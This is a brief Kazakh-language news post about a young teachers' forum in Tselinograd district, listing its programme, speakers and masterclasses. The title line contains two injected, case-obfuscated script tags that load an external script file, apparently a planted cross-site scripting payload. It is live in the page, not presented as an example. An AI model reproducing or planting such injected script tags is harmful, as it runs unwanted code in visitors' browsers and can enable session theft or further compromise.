Целиноград ауданы жас мамандар форумы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
05.11.2024
4 қараша күні өткен Целиноград ауданы жас педагогтер форумы жаңа идеялар мен шабытқа толы болды!
Талапкер IT лицей мектебінде жиналған жас ұстаздар білім беру саласының маңызды бағыттары бойынша өзара тәжірибе алмасты.
Бүгінгі форумның бағдарламасы:
1. Мотивациялық сессия
2. «Әр Сабақты қалай ерекше өткізуге болады менің тәжірибем» TEDX
3. Жас педагогтердің шығармашылық көрмесі
4. Жас педагогтердің шеберлік сабақтары өткізілетін болады.
- Мотивациялық сессиялар: Алия Жакупова , Алтын Аманова және Райхан Борлыкбаева ұстаздарды шабыттандыратын баяндамалар жасады.
- Шеберлік сабақтары: Жасанды интеллект, STEM, бастауыш сыныптарда көркем жазу дағдыларын дамыту бойынша шеберлік сабақтар өтіп, қатысушылар жаңа әдіс-тәсілдерді меңгерді.
- Шығармашылық көрмелер: Жас педагогтердің инновациялық жобалары мен заманауи оқу платформалары таныстырылды.
Бұл форум – жас мамандардың бір-біріне қолдау көрсетуге, жаңа әдістерді меңгеруге және кәсіби өсуге мүмкіндік берген тамаша алаң болды. Барлық қатысушыларға алғыс білдіреміз!
ЖасМамандарФорумы Ұстаздар ЦелиноградФорумы БілімҚуаты КәсібиДаму